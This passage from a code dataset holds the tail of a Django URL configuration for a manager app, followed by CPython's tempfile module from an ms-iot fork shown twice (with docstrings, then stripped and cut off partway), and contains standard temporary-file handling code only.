path(f'{settings.URL_PREFIX}/role/seller/', ManagerSellerRoleApiView.as_view()),
path(f'{settings.URL_PREFIX}/permission/seller/', ManagerSellerPermApiView.as_view()),
    path(f'{settings.URL_PREFIX}/carousel/', ManageCarouselApiView.as_view()),
]
| 46.030303
| 110
| 0.789993
|
from django.conf import settings
from django.urls import path, include
from manager_app.apis.auth_api import ManagerLoginApiView, ManagerRegisterApiView
from manager_app.apis.manage_carousel_api import ManageCarouselApiView
from manager_app.apis.manage_commodity_api import ManagerCommodityCategoryApiView, ManageCommodityGroupApiView
from manager_app.apis.manage_permission_api import ManagePermissionApiView
from manager_app.apis.manage_role_api import ManageRoleApiView
from manager_app.apis.manage_seller_api import ManagerSellerPermApiView, ManagerSellerRoleApiView
app_name = "manager_app"
auth_patterns = [
path('login/', ManagerLoginApiView.as_view()),
path('register/', ManagerRegisterApiView.as_view()),
]
urlpatterns = [
path(f'{settings.URL_PREFIX}/auth/', include(auth_patterns)),
path(f'{settings.URL_PREFIX}/role/', ManageRoleApiView.as_view()),
path(f'{settings.URL_PREFIX}/permission/', ManagePermissionApiView.as_view()),
path(f'{settings.URL_PREFIX}/commodity-category/', ManagerCommodityCategoryApiView.as_view()),
path(f'{settings.URL_PREFIX}/commodity-group/', ManageCommodityGroupApiView.as_view()),
path(f'{settings.URL_PREFIX}/role/seller/', ManagerSellerRoleApiView.as_view()),
path(f'{settings.URL_PREFIX}/permission/seller/', ManagerSellerPermApiView.as_view()),
    path(f'{settings.URL_PREFIX}/carousel/', ManageCarouselApiView.as_view()),
]
| true
| true
|
f707caeebe22a441a1841182e56fb3dd303cb612
| 26,230
|
py
|
Python
|
cpython/Lib/tempfile.py
|
ms-iot/python
|
a8f8fba1214289572713520f83409762a4446fea
|
[
"BSD-3-Clause"
] | 70
|
2015-06-20T17:59:24.000Z
|
2021-05-03T02:01:49.000Z
|
cpython/Lib/tempfile.py
|
ms-iot/python
|
a8f8fba1214289572713520f83409762a4446fea
|
[
"BSD-3-Clause"
] | 16
|
2015-06-11T14:57:43.000Z
|
2016-12-03T00:22:13.000Z
|
cpython/Lib/tempfile.py
|
ms-iot/python
|
a8f8fba1214289572713520f83409762a4446fea
|
[
"BSD-3-Clause"
] | 36
|
2015-05-15T20:30:44.000Z
|
2020-11-14T19:31:40.000Z
|
"""Temporary files.
This module provides generic, low- and high-level interfaces for
creating temporary files and directories. All of the interfaces
provided by this module can be used without fear of race conditions
except for 'mktemp'. 'mktemp' is subject to race conditions and
should not be used; it is provided for backward compatibility only.
The default path names are returned as str. If you supply bytes as
input, all return values will be in bytes. Ex:
>>> tempfile.mkstemp()
(4, '/tmp/tmptpu9nin8')
>>> tempfile.mkdtemp(suffix=b'')
b'/tmp/tmppbi8f0hy'
This module also provides some data items to the user:
TMP_MAX - maximum number of names that will be tried before
giving up.
tempdir - If this is set to a string before the first use of
any routine from this module, it will be considered as
another candidate location to store temporary files.
"""
__all__ = [
"NamedTemporaryFile", "TemporaryFile", # high level safe interfaces
"SpooledTemporaryFile", "TemporaryDirectory",
"mkstemp", "mkdtemp", # low level safe interfaces
"mktemp", # deprecated unsafe interface
"TMP_MAX", "gettempprefix", # constants
"tempdir", "gettempdir",
"gettempprefixb", "gettempdirb",
]
# Imports.
import functools as _functools
import warnings as _warnings
import io as _io
import os as _os
import shutil as _shutil
import errno as _errno
from random import Random as _Random
import weakref as _weakref
try:
import _thread
except ImportError:
import _dummy_thread as _thread
_allocate_lock = _thread.allocate_lock
_text_openflags = _os.O_RDWR | _os.O_CREAT | _os.O_EXCL
if hasattr(_os, 'O_NOFOLLOW'):
_text_openflags |= _os.O_NOFOLLOW
_bin_openflags = _text_openflags
if hasattr(_os, 'O_BINARY'):
_bin_openflags |= _os.O_BINARY
if hasattr(_os, 'TMP_MAX'):
TMP_MAX = _os.TMP_MAX
else:
TMP_MAX = 10000
# This variable _was_ unused for legacy reasons, see issue 10354.
# But as of 3.5 we actually use it at runtime so changing it would
# have a possibly desirable side effect... But we do not want to support
# that as an API. It is undocumented on purpose. Do not depend on this.
template = "tmp"
# Internal routines.
_once_lock = _allocate_lock()
if hasattr(_os, "lstat"):
_stat = _os.lstat
elif hasattr(_os, "stat"):
_stat = _os.stat
else:
# Fallback. All we need is something that raises OSError if the
# file doesn't exist.
def _stat(fn):
fd = _os.open(fn, _os.O_RDONLY)
_os.close(fd)
def _exists(fn):
try:
_stat(fn)
except OSError:
return False
else:
return True
def _infer_return_type(*args):
"""Look at the type of all args and divine their implied return type."""
return_type = None
for arg in args:
if arg is None:
continue
if isinstance(arg, bytes):
if return_type is str:
raise TypeError("Can't mix bytes and non-bytes in "
"path components.")
return_type = bytes
else:
if return_type is bytes:
raise TypeError("Can't mix bytes and non-bytes in "
"path components.")
return_type = str
if return_type is None:
return str # tempfile APIs return a str by default.
return return_type
def _sanitize_params(prefix, suffix, dir):
"""Common parameter processing for most APIs in this module."""
output_type = _infer_return_type(prefix, suffix, dir)
if suffix is None:
suffix = output_type()
if prefix is None:
if output_type is str:
prefix = template
else:
prefix = _os.fsencode(template)
if dir is None:
if output_type is str:
dir = gettempdir()
else:
dir = gettempdirb()
return prefix, suffix, dir, output_type
class _RandomNameSequence:
"""An instance of _RandomNameSequence generates an endless
sequence of unpredictable strings which can safely be incorporated
    into file names. Each string is eight characters long. Multiple
threads can safely use the same instance at the same time.
_RandomNameSequence is an iterator."""
characters = "abcdefghijklmnopqrstuvwxyz0123456789_"
@property
def rng(self):
cur_pid = _os.getpid()
if cur_pid != getattr(self, '_rng_pid', None):
self._rng = _Random()
self._rng_pid = cur_pid
return self._rng
def __iter__(self):
return self
def __next__(self):
c = self.characters
choose = self.rng.choice
letters = [choose(c) for dummy in range(8)]
return ''.join(letters)
def _candidate_tempdir_list():
"""Generate a list of candidate temporary directories which
_get_default_tempdir will try."""
dirlist = []
# First, try the environment.
for envname in 'TMPDIR', 'TEMP', 'TMP':
dirname = _os.getenv(envname)
if dirname: dirlist.append(dirname)
# Failing that, try OS-specific locations.
if _os.name == 'nt':
dirlist.extend([ r'c:\temp', r'c:\tmp', r'\temp', r'\tmp' ])
elif _os.name != 'uwp_os':
dirlist.extend([ '/tmp', '/var/tmp', '/usr/tmp' ])
# As a last resort, the current directory.
try:
dirlist.append(_os.getcwd())
except (AttributeError, OSError):
dirlist.append(_os.curdir)
return dirlist
def _get_default_tempdir():
"""Calculate the default directory to use for temporary files.
This routine should be called exactly once.
We determine whether or not a candidate temp dir is usable by
trying to create and write to a file in that directory. If this
is successful, the test file is deleted. To prevent denial of
service, the name of the test file must be randomized."""
namer = _RandomNameSequence()
dirlist = _candidate_tempdir_list()
for dir in dirlist:
if dir != _os.curdir:
dir = _os.path.abspath(dir)
# Try only a few names per directory.
for seq in range(100):
name = next(namer)
filename = _os.path.join(dir, name)
try:
fd = _os.open(filename, _bin_openflags, 0o600)
try:
try:
with _io.open(fd, 'wb', closefd=False) as fp:
fp.write(b'blat')
finally:
_os.close(fd)
finally:
_os.unlink(filename)
return dir
except FileExistsError:
pass
except PermissionError:
# This exception is thrown when a directory with the chosen name
                # already exists on Windows.
if ((_os.name == 'nt' or _os.name == 'uwp_os') and _os.path.isdir(dir) and
_os.access(dir, _os.W_OK)):
continue
break # no point trying more names in this directory
except OSError:
break # no point trying more names in this directory
raise FileNotFoundError(_errno.ENOENT,
"No usable temporary directory found in %s" %
dirlist)
_name_sequence = None
def _get_candidate_names():
"""Common setup sequence for all user-callable interfaces."""
global _name_sequence
if _name_sequence is None:
_once_lock.acquire()
try:
if _name_sequence is None:
_name_sequence = _RandomNameSequence()
finally:
_once_lock.release()
return _name_sequence
def _mkstemp_inner(dir, pre, suf, flags, output_type):
"""Code common to mkstemp, TemporaryFile, and NamedTemporaryFile."""
names = _get_candidate_names()
if output_type is bytes:
names = map(_os.fsencode, names)
for seq in range(TMP_MAX):
name = next(names)
file = _os.path.join(dir, pre + name + suf)
try:
fd = _os.open(file, flags, 0o600)
except FileExistsError:
continue # try again
except PermissionError:
# This exception is thrown when a directory with the chosen name
            # already exists on Windows.
if ((_os.name == 'nt' or _os.name == 'uwp_os') and _os.path.isdir(dir) and
_os.access(dir, _os.W_OK)):
continue
else:
raise
return (fd, _os.path.abspath(file))
raise FileExistsError(_errno.EEXIST,
"No usable temporary file name found")
# User visible interfaces.
def gettempprefix():
"""The default prefix for temporary directories."""
return template
def gettempprefixb():
"""The default prefix for temporary directories as bytes."""
return _os.fsencode(gettempprefix())
tempdir = None
def gettempdir():
"""Accessor for tempfile.tempdir."""
global tempdir
if tempdir is None:
_once_lock.acquire()
try:
if tempdir is None:
tempdir = _get_default_tempdir()
finally:
_once_lock.release()
return tempdir
def gettempdirb():
"""A bytes version of tempfile.gettempdir()."""
return _os.fsencode(gettempdir())
def mkstemp(suffix=None, prefix=None, dir=None, text=False):
"""User-callable function to create and return a unique temporary
file. The return value is a pair (fd, name) where fd is the
file descriptor returned by os.open, and name is the filename.
If 'suffix' is specified, the file name will end with that suffix,
otherwise there will be no suffix.
If 'prefix' is specified, the file name will begin with that prefix,
otherwise a default prefix is used.
If 'dir' is specified, the file will be created in that directory,
otherwise a default directory is used.
If 'text' is specified and true, the file is opened in text
mode. Else (the default) the file is opened in binary mode. On
some operating systems, this makes no difference.
suffix, prefix and dir must all contain the same type if specified.
If they are bytes, the returned name will be bytes; str otherwise.
A value of None will cause an appropriate default to be used.
The file is readable and writable only by the creating user ID.
If the operating system uses permission bits to indicate whether a
file is executable, the file is executable by no one. The file
descriptor is not inherited by children of this process.
Caller is responsible for deleting the file when done with it.
"""
prefix, suffix, dir, output_type = _sanitize_params(prefix, suffix, dir)
if text:
flags = _text_openflags
else:
flags = _bin_openflags
return _mkstemp_inner(dir, prefix, suffix, flags, output_type)
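# Illustrative usage sketch (not part of the original module): mkstemp hands
# back a raw OS file descriptor plus the path, and the caller owns both
# cleanup steps.
#
#     fd, path = mkstemp(suffix=".log", prefix="demo_")
#     try:
#         _os.write(fd, b"hello")
#     finally:
#         _os.close(fd)
#         _os.unlink(path)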
def mkdtemp(suffix=None, prefix=None, dir=None):
"""User-callable function to create and return a unique temporary
directory. The return value is the pathname of the directory.
Arguments are as for mkstemp, except that the 'text' argument is
not accepted.
The directory is readable, writable, and searchable only by the
creating user.
Caller is responsible for deleting the directory when done with it.
"""
prefix, suffix, dir, output_type = _sanitize_params(prefix, suffix, dir)
names = _get_candidate_names()
if output_type is bytes:
names = map(_os.fsencode, names)
for seq in range(TMP_MAX):
name = next(names)
file = _os.path.join(dir, prefix + name + suffix)
try:
_os.mkdir(file, 0o700)
except FileExistsError:
continue # try again
except PermissionError:
# This exception is thrown when a directory with the chosen name
            # already exists on Windows.
if ((_os.name == 'nt' or _os.name == 'uwp_os') and _os.path.isdir(dir) and
_os.access(dir, _os.W_OK)):
continue
else:
raise
return file
raise FileExistsError(_errno.EEXIST,
"No usable temporary directory name found")
def mktemp(suffix="", prefix=template, dir=None):
"""User-callable function to return a unique temporary file name. The
file is not created.
Arguments are as for mkstemp, except that the 'text' argument is
not accepted.
THIS FUNCTION IS UNSAFE AND SHOULD NOT BE USED. The file name may
refer to a file that did not exist at some point, but by the time
you get around to creating it, someone else may have beaten you to
the punch.
"""
## from warnings import warn as _warn
## _warn("mktemp is a potential security risk to your program",
## RuntimeWarning, stacklevel=2)
if dir is None:
dir = gettempdir()
names = _get_candidate_names()
for seq in range(TMP_MAX):
name = next(names)
file = _os.path.join(dir, prefix + name + suffix)
if not _exists(file):
return file
raise FileExistsError(_errno.EEXIST,
"No usable temporary filename found")
class _TemporaryFileCloser:
"""A separate object allowing proper closing of a temporary file's
underlying file object, without adding a __del__ method to the
temporary file."""
file = None # Set here since __del__ checks it
close_called = False
def __init__(self, file, name, delete=True):
self.file = file
self.name = name
self.delete = delete
# NT provides delete-on-close as a primitive, so we don't need
# the wrapper to do anything special. We still use it so that
# file.name is useful (i.e. not "(fdopen)") with NamedTemporaryFile.
if _os.name != 'nt' and _os.name != 'uwp_os':
# Cache the unlinker so we don't get spurious errors at
# shutdown when the module-level "os" is None'd out. Note
# that this must be referenced as self.unlink, because the
# name TemporaryFileWrapper may also get None'd out before
# __del__ is called.
def close(self, unlink=_os.unlink):
if not self.close_called and self.file is not None:
self.close_called = True
try:
self.file.close()
finally:
if self.delete:
unlink(self.name)
# Need to ensure the file is deleted on __del__
def __del__(self):
self.close()
else:
def close(self):
if not self.close_called:
self.close_called = True
self.file.close()
class _TemporaryFileWrapper:
"""Temporary file wrapper
This class provides a wrapper around files opened for
temporary use. In particular, it seeks to automatically
remove the file when it is no longer needed.
"""
def __init__(self, file, name, delete=True):
self.file = file
self.name = name
self.delete = delete
self._closer = _TemporaryFileCloser(file, name, delete)
def __getattr__(self, name):
# Attribute lookups are delegated to the underlying file
# and cached for non-numeric results
# (i.e. methods are cached, closed and friends are not)
file = self.__dict__['file']
a = getattr(file, name)
if hasattr(a, '__call__'):
func = a
@_functools.wraps(func)
def func_wrapper(*args, **kwargs):
return func(*args, **kwargs)
# Avoid closing the file as long as the wrapper is alive,
# see issue #18879.
func_wrapper._closer = self._closer
a = func_wrapper
if not isinstance(a, int):
setattr(self, name, a)
return a
# The underlying __enter__ method returns the wrong object
# (self.file) so override it to return the wrapper
def __enter__(self):
self.file.__enter__()
return self
# Need to trap __exit__ as well to ensure the file gets
# deleted when used in a with statement
def __exit__(self, exc, value, tb):
result = self.file.__exit__(exc, value, tb)
self.close()
return result
def close(self):
"""
Close the temporary file, possibly deleting it.
"""
self._closer.close()
# iter() doesn't use __getattr__ to find the __iter__ method
def __iter__(self):
# Don't return iter(self.file), but yield from it to avoid closing
# file as long as it's being used as iterator (see issue #23700). We
# can't use 'yield from' here because iter(file) returns the file
# object itself, which has a close method, and thus the file would get
# closed when the generator is finalized, due to PEP380 semantics.
for line in self.file:
yield line
def NamedTemporaryFile(mode='w+b', buffering=-1, encoding=None,
newline=None, suffix=None, prefix=None,
dir=None, delete=True):
"""Create and return a temporary file.
Arguments:
'prefix', 'suffix', 'dir' -- as for mkstemp.
'mode' -- the mode argument to io.open (default "w+b").
'buffering' -- the buffer size argument to io.open (default -1).
'encoding' -- the encoding argument to io.open (default None)
'newline' -- the newline argument to io.open (default None)
'delete' -- whether the file is deleted on close (default True).
The file is created as mkstemp() would do it.
Returns an object with a file-like interface; the name of the file
is accessible as file.name. The file will be automatically deleted
when it is closed unless the 'delete' argument is set to False.
"""
prefix, suffix, dir, output_type = _sanitize_params(prefix, suffix, dir)
flags = _bin_openflags
# Setting O_TEMPORARY in the flags causes the OS to delete
# the file when it is closed. This is only supported by Windows.
if (_os.name == 'nt' or _os.name == 'uwp_os') and delete:
flags |= _os.O_TEMPORARY
(fd, name) = _mkstemp_inner(dir, prefix, suffix, flags, output_type)
try:
file = _io.open(fd, mode, buffering=buffering,
newline=newline, encoding=encoding)
return _TemporaryFileWrapper(file, name, delete)
except Exception:
_os.close(fd)
raise
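# Illustrative usage sketch (not part of the original module): the returned
# wrapper is a context manager, and with delete=True the file is unlinked
# when it is closed.
#
#     with NamedTemporaryFile(suffix=".tmp") as f:
#         f.write(b"scratch data")
#         f.seek(0)
#         data = f.read()
#     # the file is gone here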
if _os.name != 'posix' or _os.sys.platform == 'cygwin':
# On non-POSIX and Cygwin systems, assume that we cannot unlink a file
# while it is open.
TemporaryFile = NamedTemporaryFile
else:
# Is the O_TMPFILE flag available and does it work?
# The flag is set to False if os.open(dir, os.O_TMPFILE) raises an
# IsADirectoryError exception
_O_TMPFILE_WORKS = hasattr(_os, 'O_TMPFILE')
def TemporaryFile(mode='w+b', buffering=-1, encoding=None,
newline=None, suffix=None, prefix=None,
dir=None):
"""Create and return a temporary file.
Arguments:
'prefix', 'suffix', 'dir' -- as for mkstemp.
'mode' -- the mode argument to io.open (default "w+b").
'buffering' -- the buffer size argument to io.open (default -1).
'encoding' -- the encoding argument to io.open (default None)
'newline' -- the newline argument to io.open (default None)
The file is created as mkstemp() would do it.
Returns an object with a file-like interface. The file has no
name, and will cease to exist when it is closed.
"""
global _O_TMPFILE_WORKS
prefix, suffix, dir, output_type = _sanitize_params(prefix, suffix, dir)
flags = _bin_openflags
if _O_TMPFILE_WORKS:
try:
flags2 = (flags | _os.O_TMPFILE) & ~_os.O_CREAT
fd = _os.open(dir, flags2, 0o600)
except IsADirectoryError:
# Linux kernel older than 3.11 ignores O_TMPFILE flag.
# Set flag to False to not try again.
_O_TMPFILE_WORKS = False
except OSError:
# The filesystem of the directory does not support O_TMPFILE.
# For example, OSError(95, 'Operation not supported').
pass
else:
try:
return _io.open(fd, mode, buffering=buffering,
newline=newline, encoding=encoding)
except:
_os.close(fd)
raise
# Fallback to _mkstemp_inner().
(fd, name) = _mkstemp_inner(dir, prefix, suffix, flags, output_type)
try:
_os.unlink(name)
return _io.open(fd, mode, buffering=buffering,
newline=newline, encoding=encoding)
except:
_os.close(fd)
raise
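# Illustrative sketch (not part of the original module): on POSIX the file is
# anonymous -- either opened with O_TMPFILE or unlinked immediately after
# creation -- so it has no visible name and vanishes on close.
#
#     with TemporaryFile() as f:
#         f.write(b"spill data")
#         f.seek(0)
#         f.read()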
class SpooledTemporaryFile:
"""Temporary file wrapper, specialized to switch from BytesIO
or StringIO to a real file when it exceeds a certain size or
when a fileno is needed.
"""
_rolled = False
def __init__(self, max_size=0, mode='w+b', buffering=-1,
encoding=None, newline=None,
suffix=None, prefix=None, dir=None):
if 'b' in mode:
self._file = _io.BytesIO()
else:
# Setting newline="\n" avoids newline translation;
# this is important because otherwise on Windows we'd
# get double newline translation upon rollover().
self._file = _io.StringIO(newline="\n")
self._max_size = max_size
self._rolled = False
self._TemporaryFileArgs = {'mode': mode, 'buffering': buffering,
'suffix': suffix, 'prefix': prefix,
'encoding': encoding, 'newline': newline,
'dir': dir}
def _check(self, file):
if self._rolled: return
max_size = self._max_size
if max_size and file.tell() > max_size:
self.rollover()
def rollover(self):
if self._rolled: return
file = self._file
newfile = self._file = TemporaryFile(**self._TemporaryFileArgs)
del self._TemporaryFileArgs
newfile.write(file.getvalue())
newfile.seek(file.tell(), 0)
self._rolled = True
# The method caching trick from NamedTemporaryFile
# won't work here, because _file may change from a
# BytesIO/StringIO instance to a real file. So we list
# all the methods directly.
# Context management protocol
def __enter__(self):
if self._file.closed:
raise ValueError("Cannot enter context with closed file")
return self
def __exit__(self, exc, value, tb):
self._file.close()
# file protocol
def __iter__(self):
return self._file.__iter__()
def close(self):
self._file.close()
@property
def closed(self):
return self._file.closed
@property
def encoding(self):
try:
return self._file.encoding
except AttributeError:
if 'b' in self._TemporaryFileArgs['mode']:
raise
return self._TemporaryFileArgs['encoding']
def fileno(self):
self.rollover()
return self._file.fileno()
def flush(self):
self._file.flush()
def isatty(self):
return self._file.isatty()
@property
def mode(self):
try:
return self._file.mode
except AttributeError:
return self._TemporaryFileArgs['mode']
@property
def name(self):
try:
return self._file.name
except AttributeError:
return None
@property
def newlines(self):
try:
return self._file.newlines
except AttributeError:
if 'b' in self._TemporaryFileArgs['mode']:
raise
return self._TemporaryFileArgs['newline']
def read(self, *args):
return self._file.read(*args)
def readline(self, *args):
return self._file.readline(*args)
def readlines(self, *args):
return self._file.readlines(*args)
def seek(self, *args):
self._file.seek(*args)
@property
def softspace(self):
return self._file.softspace
def tell(self):
return self._file.tell()
def truncate(self, size=None):
if size is None:
self._file.truncate()
else:
if size > self._max_size:
self.rollover()
self._file.truncate(size)
def write(self, s):
file = self._file
rv = file.write(s)
self._check(file)
return rv
def writelines(self, iterable):
file = self._file
rv = file.writelines(iterable)
self._check(file)
return rv
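# Illustrative sketch (not part of the original module): SpooledTemporaryFile
# stays an in-memory BytesIO/StringIO until max_size is exceeded (or fileno()
# is requested), at which point rollover() moves the data into a real
# TemporaryFile.
#
#     f = SpooledTemporaryFile(max_size=1024)
#     f.write(b"x" * 100)    # still in memory: f._rolled is False
#     f.write(b"x" * 2000)   # past max_size: rolled over to a real file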
class TemporaryDirectory(object):
"""Create and return a temporary directory. This has the same
behavior as mkdtemp but can be used as a context manager. For
example:
with TemporaryDirectory() as tmpdir:
...
Upon exiting the context, the directory and everything contained
in it are removed.
"""
def __init__(self, suffix=None, prefix=None, dir=None):
self.name = mkdtemp(suffix, prefix, dir)
self._finalizer = _weakref.finalize(
self, self._cleanup, self.name,
warn_message="Implicitly cleaning up {!r}".format(self))
@classmethod
def _cleanup(cls, name, warn_message):
_shutil.rmtree(name)
_warnings.warn(warn_message, ResourceWarning)
def __repr__(self):
return "<{} {!r}>".format(self.__class__.__name__, self.name)
def __enter__(self):
return self.name
def __exit__(self, exc, value, tb):
self.cleanup()
def cleanup(self):
if self._finalizer.detach():
_shutil.rmtree(self.name)
| 32.665006
| 90
| 0.613534
|
__all__ = [
"NamedTemporaryFile", "TemporaryFile", "SpooledTemporaryFile", "TemporaryDirectory",
"mkstemp", "mkdtemp", "mktemp", "TMP_MAX", "gettempprefix", "tempdir", "gettempdir",
"gettempprefixb", "gettempdirb",
]
import functools as _functools
import warnings as _warnings
import io as _io
import os as _os
import shutil as _shutil
import errno as _errno
from random import Random as _Random
import weakref as _weakref
try:
import _thread
except ImportError:
import _dummy_thread as _thread
_allocate_lock = _thread.allocate_lock
_text_openflags = _os.O_RDWR | _os.O_CREAT | _os.O_EXCL
if hasattr(_os, 'O_NOFOLLOW'):
_text_openflags |= _os.O_NOFOLLOW
_bin_openflags = _text_openflags
if hasattr(_os, 'O_BINARY'):
_bin_openflags |= _os.O_BINARY
if hasattr(_os, 'TMP_MAX'):
TMP_MAX = _os.TMP_MAX
else:
TMP_MAX = 10000
template = "tmp"
_once_lock = _allocate_lock()
if hasattr(_os, "lstat"):
_stat = _os.lstat
elif hasattr(_os, "stat"):
_stat = _os.stat
else:
def _stat(fn):
fd = _os.open(fn, _os.O_RDONLY)
_os.close(fd)
def _exists(fn):
try:
_stat(fn)
except OSError:
return False
else:
return True
def _infer_return_type(*args):
return_type = None
for arg in args:
if arg is None:
continue
if isinstance(arg, bytes):
if return_type is str:
raise TypeError("Can't mix bytes and non-bytes in "
"path components.")
return_type = bytes
else:
if return_type is bytes:
raise TypeError("Can't mix bytes and non-bytes in "
"path components.")
return_type = str
if return_type is None:
return str # tempfile APIs return a str by default.
return return_type
def _sanitize_params(prefix, suffix, dir):
output_type = _infer_return_type(prefix, suffix, dir)
if suffix is None:
suffix = output_type()
if prefix is None:
if output_type is str:
prefix = template
else:
prefix = _os.fsencode(template)
if dir is None:
if output_type is str:
dir = gettempdir()
else:
dir = gettempdirb()
return prefix, suffix, dir, output_type
class _RandomNameSequence:
characters = "abcdefghijklmnopqrstuvwxyz0123456789_"
@property
def rng(self):
cur_pid = _os.getpid()
if cur_pid != getattr(self, '_rng_pid', None):
self._rng = _Random()
self._rng_pid = cur_pid
return self._rng
def __iter__(self):
return self
def __next__(self):
c = self.characters
choose = self.rng.choice
letters = [choose(c) for dummy in range(8)]
return ''.join(letters)
def _candidate_tempdir_list():
dirlist = []
# First, try the environment.
for envname in 'TMPDIR', 'TEMP', 'TMP':
dirname = _os.getenv(envname)
if dirname: dirlist.append(dirname)
# Failing that, try OS-specific locations.
if _os.name == 'nt':
dirlist.extend([ r'c:\temp', r'c:\tmp', r'\temp', r'\tmp' ])
elif _os.name != 'uwp_os':
dirlist.extend([ '/tmp', '/var/tmp', '/usr/tmp' ])
# As a last resort, the current directory.
try:
dirlist.append(_os.getcwd())
except (AttributeError, OSError):
dirlist.append(_os.curdir)
return dirlist
def _get_default_tempdir():
namer = _RandomNameSequence()
dirlist = _candidate_tempdir_list()
for dir in dirlist:
if dir != _os.curdir:
dir = _os.path.abspath(dir)
# Try only a few names per directory.
for seq in range(100):
name = next(namer)
filename = _os.path.join(dir, name)
try:
fd = _os.open(filename, _bin_openflags, 0o600)
try:
try:
with _io.open(fd, 'wb', closefd=False) as fp:
fp.write(b'blat')
finally:
_os.close(fd)
finally:
_os.unlink(filename)
return dir
except FileExistsError:
pass
except PermissionError:
# This exception is thrown when a directory with the chosen name
                # already exists on Windows.
if ((_os.name == 'nt' or _os.name == 'uwp_os') and _os.path.isdir(dir) and
_os.access(dir, _os.W_OK)):
continue
break # no point trying more names in this directory
except OSError:
break # no point trying more names in this directory
raise FileNotFoundError(_errno.ENOENT,
"No usable temporary directory found in %s" %
dirlist)
_name_sequence = None
def _get_candidate_names():
global _name_sequence
if _name_sequence is None:
_once_lock.acquire()
try:
if _name_sequence is None:
_name_sequence = _RandomNameSequence()
finally:
_once_lock.release()
return _name_sequence
def _mkstemp_inner(dir, pre, suf, flags, output_type):
names = _get_candidate_names()
if output_type is bytes:
names = map(_os.fsencode, names)
for seq in range(TMP_MAX):
name = next(names)
file = _os.path.join(dir, pre + name + suf)
try:
fd = _os.open(file, flags, 0o600)
except FileExistsError:
continue # try again
except PermissionError:
# This exception is thrown when a directory with the chosen name
            # already exists on Windows.
if ((_os.name == 'nt' or _os.name == 'uwp_os') and _os.path.isdir(dir) and
_os.access(dir, _os.W_OK)):
continue
else:
raise
return (fd, _os.path.abspath(file))
raise FileExistsError(_errno.EEXIST,
"No usable temporary file name found")
# User visible interfaces.
def gettempprefix():
return template
def gettempprefixb():
return _os.fsencode(gettempprefix())
tempdir = None
def gettempdir():
global tempdir
if tempdir is None:
_once_lock.acquire()
try:
if tempdir is None:
tempdir = _get_default_tempdir()
finally:
_once_lock.release()
return tempdir
def gettempdirb():
return _os.fsencode(gettempdir())
def mkstemp(suffix=None, prefix=None, dir=None, text=False):
prefix, suffix, dir, output_type = _sanitize_params(prefix, suffix, dir)
if text:
flags = _text_openflags
else:
flags = _bin_openflags
return _mkstemp_inner(dir, prefix, suffix, flags, output_type)
def mkdtemp(suffix=None, prefix=None, dir=None):
prefix, suffix, dir, output_type = _sanitize_params(prefix, suffix, dir)
names = _get_candidate_names()
if output_type is bytes:
names = map(_os.fsencode, names)
for seq in range(TMP_MAX):
name = next(names)
file = _os.path.join(dir, prefix + name + suffix)
try:
_os.mkdir(file, 0o700)
except FileExistsError:
continue # try again
except PermissionError:
# This exception is thrown when a directory with the chosen name
            # already exists on Windows.
if ((_os.name == 'nt' or _os.name == 'uwp_os') and _os.path.isdir(dir) and
_os.access(dir, _os.W_OK)):
continue
else:
raise
return file
raise FileExistsError(_errno.EEXIST,
"No usable temporary directory name found")
def mktemp(suffix="", prefix=template, dir=None):
## from warnings import warn as _warn
## _warn("mktemp is a potential security risk to your program",
## RuntimeWarning, stacklevel=2)
if dir is None:
dir = gettempdir()
names = _get_candidate_names()
for seq in range(TMP_MAX):
name = next(names)
file = _os.path.join(dir, prefix + name + suffix)
if not _exists(file):
return file
raise FileExistsError(_errno.EEXIST,
"No usable temporary filename found")
class _TemporaryFileCloser:
file = None # Set here since __del__ checks it
close_called = False
def __init__(self, file, name, delete=True):
self.file = file
self.name = name
self.delete = delete
        # NT provides delete-on-close as a primitive, so we don't need
        # the wrapper to do anything special.  We still use it so that
        # file.name is useful (i.e. not "(fdopen)") with NamedTemporaryFile.
if _os.name != 'nt' and _os.name != 'uwp_os':
            # Cache the unlinker so we don't get spurious errors at
            # shutdown when the module-level "os" is None'd out.  Note
            # that this must be referenced as self.unlink, because the
            # name TemporaryFileWrapper may also get None'd out before
            # __del__ is called.
def close(self, unlink=_os.unlink):
if not self.close_called and self.file is not None:
self.close_called = True
try:
self.file.close()
finally:
if self.delete:
unlink(self.name)
# Need to ensure the file is deleted on __del__
def __del__(self):
self.close()
else:
def close(self):
if not self.close_called:
self.close_called = True
self.file.close()
class _TemporaryFileWrapper:
def __init__(self, file, name, delete=True):
self.file = file
self.name = name
self.delete = delete
self._closer = _TemporaryFileCloser(file, name, delete)
def __getattr__(self, name):
# Attribute lookups are delegated to the underlying file
# and cached for non-numeric results
# (i.e. methods are cached, closed and friends are not)
file = self.__dict__['file']
a = getattr(file, name)
if hasattr(a, '__call__'):
func = a
@_functools.wraps(func)
def func_wrapper(*args, **kwargs):
return func(*args, **kwargs)
# Avoid closing the file as long as the wrapper is alive,
# see issue #18879.
func_wrapper._closer = self._closer
a = func_wrapper
if not isinstance(a, int):
setattr(self, name, a)
return a
# The underlying __enter__ method returns the wrong object
# (self.file) so override it to return the wrapper
def __enter__(self):
self.file.__enter__()
return self
# Need to trap __exit__ as well to ensure the file gets
# deleted when used in a with statement
def __exit__(self, exc, value, tb):
result = self.file.__exit__(exc, value, tb)
self.close()
return result
def close(self):
self._closer.close()
# iter() doesn't use __getattr__ to find the __iter__ method
def __iter__(self):
        # Don't return iter(self.file), but yield from it to avoid closing
        # file as long as it's being used as iterator (see issue #23700).  We
        # can't use 'yield from' here because iter(file) returns the file
        # object itself, which has a close method, and thus the file would get
        # closed when the generator is finalized, due to PEP380 semantics.
for line in self.file:
yield line
def NamedTemporaryFile(mode='w+b', buffering=-1, encoding=None,
newline=None, suffix=None, prefix=None,
dir=None, delete=True):
prefix, suffix, dir, output_type = _sanitize_params(prefix, suffix, dir)
flags = _bin_openflags
# Setting O_TEMPORARY in the flags causes the OS to delete
# the file when it is closed. This is only supported by Windows.
if (_os.name == 'nt' or _os.name == 'uwp_os') and delete:
flags |= _os.O_TEMPORARY
(fd, name) = _mkstemp_inner(dir, prefix, suffix, flags, output_type)
try:
file = _io.open(fd, mode, buffering=buffering,
newline=newline, encoding=encoding)
return _TemporaryFileWrapper(file, name, delete)
except Exception:
_os.close(fd)
raise
if _os.name != 'posix' or _os.sys.platform == 'cygwin':
# On non-POSIX and Cygwin systems, assume that we cannot unlink a file
# while it is open.
TemporaryFile = NamedTemporaryFile
else:
# Is the O_TMPFILE flag available and does it work?
# The flag is set to False if os.open(dir, os.O_TMPFILE) raises an
# IsADirectoryError exception
_O_TMPFILE_WORKS = hasattr(_os, 'O_TMPFILE')
